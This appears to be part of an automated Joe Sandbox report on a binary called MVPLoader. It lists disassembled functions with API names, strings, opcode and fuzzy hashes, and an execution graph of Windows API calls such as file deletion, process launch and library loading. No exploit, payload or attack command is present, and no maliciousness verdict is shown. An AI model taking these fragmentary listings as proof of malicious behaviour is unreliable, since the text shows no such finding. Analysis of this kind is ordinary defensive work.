                                                  • Unable to construct method call from message on channel , xrefs: 00007FF7605B7516
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: V01@$??6?$basic_ostream@Concurrency::cancel_current_taskD@std@@@std@@U?$char_traits@V01@@Xbad_function_call@std@@malloc
                                                  • String ID: Unable to construct method call from message on channel
                                                  • API String ID: 923330219-628498582
                                                  • Opcode ID: cef58cbbf28c9e464734c19a597853693ac0bc45b3100204e850c140881521e4
                                                  • Instruction ID: 1b9330d7e1d47f6868c994e10303c350cb172e531ef85152e61a4899e30106d4
                                                  • Opcode Fuzzy Hash: cef58cbbf28c9e464734c19a597853693ac0bc45b3100204e850c140881521e4
                                                  • Instruction Fuzzy Hash: F7618136609B45C2EA25EF15E460AAAB3A4FB88F84F844431DE8E07B56DF3CF495C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605BC540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7605BCA2F
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BCA3F
                                                  Strings
                                                  • Unknown type in StandardCodecSerializer::ReadValueOfType: , xrefs: 00007FF7605BCA17
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@$V01@@
                                                  • String ID: Unknown type in StandardCodecSerializer::ReadValueOfType:
                                                  • API String ID: 3022475274-3930014659
                                                  • Opcode ID: a94a04c052e24989abf2f5b7f3affa4718845a90cc223d3a02387e56b8952404
                                                  • Instruction ID: 941fdf0b0daf6b538f66dfb11bc74369ed6ad76f5267be133aec1f7c76da2148
                                                  • Opcode Fuzzy Hash: a94a04c052e24989abf2f5b7f3affa4718845a90cc223d3a02387e56b8952404
                                                  • Instruction Fuzzy Hash: 79118E26A19B45D9EB01EB16FC64AA6A764BB487E8F804435DD0D03366EF3CF096C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B5F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Monitor$FromInfoWindow
                                                  • String ID: (
                                                  • API String ID: 332468611-3887548279
                                                  • Opcode ID: 4891cdfa38bf7cb6258a7999dd160a60b713b7657da3ff95024469f577dce6c0
                                                  • Instruction ID: 9f38871d6aa0746126347699eda5d5d33c29e87edce56acf269178d903fa864c
                                                  • Opcode Fuzzy Hash: 4891cdfa38bf7cb6258a7999dd160a60b713b7657da3ff95024469f577dce6c0
                                                  • Instruction Fuzzy Hash: 8A119072928741CAE758DF25E45042EB7A0FB88B44B405239EA4D42719EF3CE190CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B3060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: ClassDestroyUnregisterWindow
                                                  • String ID: FLUTTER_RUNNER_WIN32_WINDOW
                                                  • API String ID: 3182838500-3066883769
                                                  • Opcode ID: 378128563c1f71c92ebf69bbe3bddbe83e42168acbb65d2d475a9656d712f9e6
                                                  • Instruction ID: f280a34ff2ec4f4eced479c60c9faa6cddede2a6ff269ee7e832728de52eab22
                                                  • Opcode Fuzzy Hash: 378128563c1f71c92ebf69bbe3bddbe83e42168acbb65d2d475a9656d712f9e6
                                                  • Instruction Fuzzy Hash: F1013125A09B06C6FB15BF65D468B75A390AF54B04FC84435CA0E06392DF7CF584C371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B5FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Monitor$FromInfoWindow
                                                  • String ID: (
                                                  • API String ID: 332468611-3887548279
                                                  • Opcode ID: 616828ad9e418b93184a309d342e0fb10020226910494d00d4f3ef12efbfb7c9
                                                  • Instruction ID: 291b63e90fdfbaffe25aa144fd0b49c3917e2f939c5861e3d64419fec84ec05d
                                                  • Opcode Fuzzy Hash: 616828ad9e418b93184a309d342e0fb10020226910494d00d4f3ef12efbfb7c9
                                                  • Instruction Fuzzy Hash: BC014F76929745C6EB50EB25E45456AB3B0FB98B44F405235DA8D06315EF3CF1948B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B1BD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Xlength_error@std@@
                                                  • String ID: unknown exception$vector too long
                                                  • API String ID: 1004598685-3115895111
                                                  • Opcode ID: 85c11fd70c1cfe7c8022a1eb601ba302103dd22deb01f3cbf73171b61f87a42d
                                                  • Instruction ID: 9f5e5add0ce3784241d1aa15afd389185c7e9d31417716c6faaef368e4089b81
                                                  • Opcode Fuzzy Hash: 85c11fd70c1cfe7c8022a1eb601ba302103dd22deb01f3cbf73171b61f87a42d
                                                  • Instruction Fuzzy Hash: 95C01299B0690AD0ED08BF08D9A0964A322AF40784BE08872C40C0233AEF6DF486C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605BD00A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B36F3
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3708
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B371D
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B373D
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B375C
                                                    • Part of subcall function 00007FF7605B36B0: ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3770
                                                    • Part of subcall function 00007FF7605B36B0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3783
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3793
                                                    • Part of subcall function 00007FF7605B36B0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38AC
                                                    • Part of subcall function 00007FF7605B36B0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38B6
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38C7
                                                    • Part of subcall function 00007FF7605B36B0: ?flags@ios_base@std@@QEBAHXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37BA
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37DA
                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37ED
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37F9
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3816
                                                    • Part of subcall function 00007FF7605B36B0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3825
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B384A
                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B385D
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3869
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3896
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BD036
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@V01@$??6?$basic_ostream@?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V01@@V12@V?$basic_ostream@
                                                  • String ID: Custom types require codec extensions.$Unhandled custom type in StandardCodecSerializer::WriteValue.
                                                  • API String ID: 2005165258-885065478
                                                  • Opcode ID: 624cc1e57f1fc9a241573b9ad8c26ce922f488f05843d064771418d5beb92cce
                                                  • Instruction ID: df5a2e819810b4992499ef9113803fbae1bec567ca72bbef5d2c54c3262574fd
                                                  • Opcode Fuzzy Hash: 624cc1e57f1fc9a241573b9ad8c26ce922f488f05843d064771418d5beb92cce
                                                  • Instruction Fuzzy Hash: 58D06C68E69A02E1EA04FF19E8B18B9A721AF45780BD05432C80E16367EF7CB448C370
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:9.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:2.6%
                                                  Total number of Nodes:1483
                                                  Total number of Limit Nodes:28
                                                  execution_graph 24727 271025 29 API calls pre_c_initialization 22831 279f2f 22832 279f44 22831->22832 22835 279f3d 22831->22835 22833 279f4a GetStdHandle 22832->22833 22841 279f55 22832->22841 22833->22841 22834 279fa9 WriteFile 22834->22841 22836 279f7c WriteFile 22837 279f7a 22836->22837 22836->22841 22837->22836 22837->22841 22839 27a031 22843 277061 75 API calls 22839->22843 22841->22834 22841->22835 22841->22836 22841->22837 22841->22839 22842 276e18 60 API calls 22841->22842 22842->22841 22843->22835 24728 28a430 73 API calls 24786 28be49 103 API calls 4 library calls 24787 271f05 121 API calls __EH_prolog 24729 28ec0b 28 API calls 2 library calls 24789 28db0b 19 API calls ___delayLoadHelper2@8 23105 28c40e 23106 28c4c7 23105->23106 23114 28c42c _wcschr 23105->23114 23107 28c4e5 23106->23107 23120 28be49 _wcsrchr 23106->23120 23160 28ce22 23106->23160 23110 28ce22 18 API calls 23107->23110 23107->23120 23110->23120 23111 28ca8d 23112 2817ac CompareStringW 23112->23114 23114->23106 23114->23112 23115 28c11d SetWindowTextW 23115->23120 23120->23111 23120->23115 23121 28bf0b SetFileAttributesW 23120->23121 23126 28c2e7 GetDlgItem SetWindowTextW SendMessageW 23120->23126 23129 28c327 SendMessageW 23120->23129 23134 2817ac CompareStringW 23120->23134 23135 28aa36 23120->23135 23139 289da4 GetCurrentDirectoryW 23120->23139 23144 27a52a 7 API calls 23120->23144 23145 27a4b3 FindClose 23120->23145 23146 28ab9a 76 API calls new 23120->23146 23147 2935de 23120->23147 23122 28bfc5 GetFileAttributesW 23121->23122 23133 28bf25 ___scrt_get_show_window_mode 23121->23133 23122->23120 23125 28bfd7 DeleteFileW 23122->23125 23125->23120 23127 28bfe8 23125->23127 23126->23120 23141 27400a 23127->23141 23129->23120 23131 28c01d MoveFileW 23131->23120 23132 28c035 MoveFileExW 23131->23132 23132->23120 23133->23120 23133->23122 23140 27b4f7 52 API calls 2 library calls 23133->23140 23134->23120 23136 28aa40 23135->23136 23137 28aaf3 ExpandEnvironmentStringsW 23136->23137 23138 28ab16 23136->23138 23137->23138 23138->23120 23139->23120 23140->23133 23183 273fdd 23141->23183 23144->23120 23145->23120 23146->23120 23148 298606 23147->23148 23149 29861e 23148->23149 23150 298613 23148->23150 23152 298626 23149->23152 23158 29862f ___FrameUnwindToState 23149->23158 23151 298518 __vsnwprintf_l 21 API calls 23150->23151 23156 29861b 23151->23156 23153 2984de _free 20 API calls 23152->23153 23153->23156 23154 298659 HeapReAlloc 23154->23156 23154->23158 23155 298634 23212 29895a 20 API calls _abort 23155->23212 23156->23120 23158->23154 23158->23155 23213 2971ad 7 API calls 2 library calls 23158->23213 23162 28ce2c ___scrt_get_show_window_mode 23160->23162 23161 28d08a 23161->23107 23162->23161 23163 28cf1b 23162->23163 23217 2817ac CompareStringW 23162->23217 23214 27a180 23163->23214 23167 28cf4f ShellExecuteExW 23167->23161 23173 28cf62 23167->23173 23169 28cf47 23169->23167 23170 28cf9b 23219 28d2e6 6 API calls 23170->23219 23171 28cff1 CloseHandle 23172 28cfff 23171->23172 23175 28d00a 23171->23175 23220 2817ac CompareStringW 23172->23220 23173->23170 23173->23171 23176 28cf91 ShowWindow 23173->23176 23175->23161 23179 28d081 ShowWindow 23175->23179 23176->23170 23178 28cfb3 23178->23171 23180 28cfc6 GetExitCodeProcess 23178->23180 23179->23161 23180->23171 23181 28cfd9 23180->23181 23181->23171 23184 273ff4 __vsnwprintf_l 23183->23184 23187 295759 23184->23187 23190 293837 23187->23190 23191 29385f 23190->23191 23192 293877 23190->23192 23207 29895a 20 API calls _abort 23191->23207 23192->23191 23194 29387f 23192->23194 23196 293dd6 __cftof 38 API calls 23194->23196 23195 293864 23208 298839 26 API calls _abort 23195->23208 23198 29388f 23196->23198 23209 293da1 20 API calls 2 library calls 23198->23209 23200 28ec4a _ValidateLocalCookies 5 API calls 23202 273ffe GetFileAttributesW 23200->23202 23201 293907 23210 294186 51 API calls 4 library calls 23201->23210 23202->23127 23202->23131 23205 29386f 23205->23200 23206 293912 23211 293e59 20 API calls _free 23206->23211 23207->23195 23208->23205 23209->23201 23210->23206 23211->23205 23212->23156 23213->23158 23221 27a194 23214->23221 23217->23163 23218 27b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23218->23169 23219->23178 23220->23175 23229 28e360 23221->23229 23224 27a1b2 23231 27b66c 23224->23231 23225 27a189 23225->23167 23225->23218 23227 27a1c6 23227->23225 23228 27a1ca GetFileAttributesW 23227->23228 23228->23225 23230 27a1a1 GetFileAttributesW 23229->23230 23230->23224 23230->23225 23232 27b679 23231->23232 23233 27b683 23232->23233 23241 27b806 CharUpperW 23232->23241 23233->23227 23235 27b692 23242 27b832 CharUpperW 23235->23242 23237 27b6a1 23238 27b6a5 23237->23238 23239 27b71c GetCurrentDirectoryW 23237->23239 23243 27b806 CharUpperW 23238->23243 23239->23233 23241->23235 23242->23237 23243->23233 24730 28ea00 46 API calls 6 library calls 23244 28db01 23245 28daaa 23244->23245 23247 28df59 23245->23247 23275 28dc67 23247->23275 23249 28df73 23250 28dfd0 23249->23250 23251 28dff4 23249->23251 23252 28ded7 DloadReleaseSectionWriteAccess 11 API calls 23250->23252 23254 28e06c LoadLibraryExA 23251->23254 23256 28e0df 23251->23256 23257 28e0cd 23251->23257 23269 28e19b 23251->23269 23253 28dfdb RaiseException 23252->23253 23270 28e1c9 23253->23270 23254->23257 23258 28e07f GetLastError 23254->23258 23255 28ec4a _ValidateLocalCookies 5 API calls 23259 28e1d8 23255->23259 23260 28e13d GetProcAddress 23256->23260 23256->23269 23257->23256 23261 28e0d8 FreeLibrary 23257->23261 23262 28e0a8 23258->23262 23263 28e092 23258->23263 23259->23245 23265 28e14d GetLastError 23260->23265 23260->23269 23261->23256 23264 28ded7 DloadReleaseSectionWriteAccess 11 API calls 23262->23264 23263->23257 23263->23262 23266 28e0b3 RaiseException 23264->23266 23267 28e160 23265->23267 23266->23270 23267->23269 23271 28ded7 DloadReleaseSectionWriteAccess 11 API calls 23267->23271 23286 28ded7 23269->23286 23270->23255 23272 28e181 RaiseException 23271->23272 23273 28dc67 ___delayLoadHelper2@8 11 API calls 23272->23273 23274 28e198 23273->23274 23274->23269 23276 28dc99 23275->23276 23277 28dc73 23275->23277 23276->23249 23294 28dd15 23277->23294 23280 28dc94 23304 28dc9a 23280->23304 23283 28ec4a _ValidateLocalCookies 5 API calls 23284 28df55 23283->23284 23284->23249 23285 28df24 23285->23283 23287 28dee9 23286->23287 23288 28df0b 23286->23288 23289 28dd15 DloadLock 8 API calls 23287->23289 23288->23270 23290 28deee 23289->23290 23291 28df06 23290->23291 23292 28de67 DloadProtectSection 3 API calls 23290->23292 23313 28df0f 8 API calls 2 library calls 23291->23313 23292->23291 23295 28dc9a DloadLock 3 API calls 23294->23295 23296 28dd2a 23295->23296 23297 28ec4a _ValidateLocalCookies 5 API calls 23296->23297 23298 28dc78 23297->23298 23298->23280 23299 28de67 23298->23299 23300 28de7c DloadObtainSection 23299->23300 23301 28de82 23300->23301 23302 28deb7 VirtualProtect 23300->23302 23312 28dd72 VirtualQuery GetSystemInfo 23300->23312 23301->23280 23302->23301 23305 28dcab 23304->23305 23306 28dca7 23304->23306 23307 28dcaf 23305->23307 23308 28dcb3 GetModuleHandleW 23305->23308 23306->23285 23307->23285 23309 28dcc9 GetProcAddress 23308->23309 23311 28dcc5 23308->23311 23310 28dcd9 GetProcAddress 23309->23310 23309->23311 23310->23311 23311->23285 23312->23302 23313->23288 24790 28be49 108 API calls 4 library calls 24791 276110 80 API calls 24792 29b710 GetProcessHeap 24734 28fc60 51 API calls 2 library calls 24736 293460 RtlUnwind 24737 299c60 71 API calls _free 24738 299e60 31 API calls 2 library calls 24739 271075 82 API calls pre_c_initialization 24225 28d573 24226 28d580 24225->24226 24227 27ddd1 53 API calls 24226->24227 24228 28d594 24227->24228 24229 27400a _swprintf 51 API calls 24228->24229 24230 28d5a6 SetDlgItemTextW 24229->24230 24231 28ac74 5 API calls 24230->24231 24232 28d5c3 24231->24232 24742 285c77 116 API calls __vsnwprintf_l 24795 28d34e DialogBoxParamW 24744 28ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24745 288c40 GetClientRect 24746 293040 5 API calls 2 library calls 24796 28be49 98 API calls 3 library calls 24747 2a0040 IsProcessorFeaturePresent 24797 289b50 GdipDisposeImage GdipFree __except_handler4 24749 298050 8 API calls ___vcrt_uninitialize 24722 279b59 24725 279bd7 24722->24725 24726 279b63 24722->24726 24723 279bad SetFilePointer 24724 279bcd GetLastError 24723->24724 24723->24725 24724->24725 24726->24723 24750 2796a0 79 API calls 24800 29e9a0 51 API calls 24753 28e4a2 38 API calls ___FrameUnwindToState 24756 2976bd 52 API calls 2 library calls 24757 2716b0 84 API calls 22848 2990b0 22856 29a56f 22848->22856 22852 2990d9 22853 2990cc 22853->22852 22864 2990e0 11 API calls 22853->22864 22855 2990c4 22865 29a458 22856->22865 22859 29a5ae TlsAlloc 22862 29a59f 22859->22862 22861 2990ba 22861->22855 22863 299029 20 API calls 3 library calls 22861->22863 22872 28ec4a 22862->22872 22863->22853 22864->22855 22866 29a488 22865->22866 22867 29a484 22865->22867 22866->22859 22866->22862 22867->22866 22868 29a4a8 22867->22868 22879 29a4f4 22867->22879 22868->22866 22870 29a4b4 GetProcAddress 22868->22870 22871 29a4c4 __crt_fast_encode_pointer 22870->22871 22871->22866 22873 28ec53 22872->22873 22874 28ec55 IsProcessorFeaturePresent 22872->22874 22873->22861 22876 28f267 22874->22876 22886 28f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22876->22886 22878 28f34a 22878->22861 22880 29a515 LoadLibraryExW 22879->22880 22884 29a50a 22879->22884 22881 29a54a 22880->22881 22882 29a532 GetLastError 22880->22882 22881->22884 22885 29a561 FreeLibrary 22881->22885 22882->22881 22883 29a53d LoadLibraryExW 22882->22883 22883->22881 22884->22867 22885->22884 22886->22878 22887 29a3b0 22888 29a3bb 22887->22888 22890 29a3e4 22888->22890 22892 29a3e0 22888->22892 22893 29a6ca 22888->22893 22900 29a410 DeleteCriticalSection 22890->22900 22894 29a458 _abort 5 API calls 22893->22894 22895 29a6f1 22894->22895 22896 29a70f InitializeCriticalSectionAndSpinCount 22895->22896 22897 29a6fa 22895->22897 22896->22897 22898 28ec4a _ValidateLocalCookies 5 API calls 22897->22898 22899 29a726 22898->22899 22899->22888 22900->22892 24758 291eb0 6 API calls 3 library calls 22902 2979b7 22913 29b290 22902->22913 22907 2979d4 22909 2984de _free 20 API calls 22907->22909 22910 297a09 22909->22910 22911 2979df 22930 2984de 22911->22930 22914 29b299 22913->22914 22915 2979c9 22913->22915 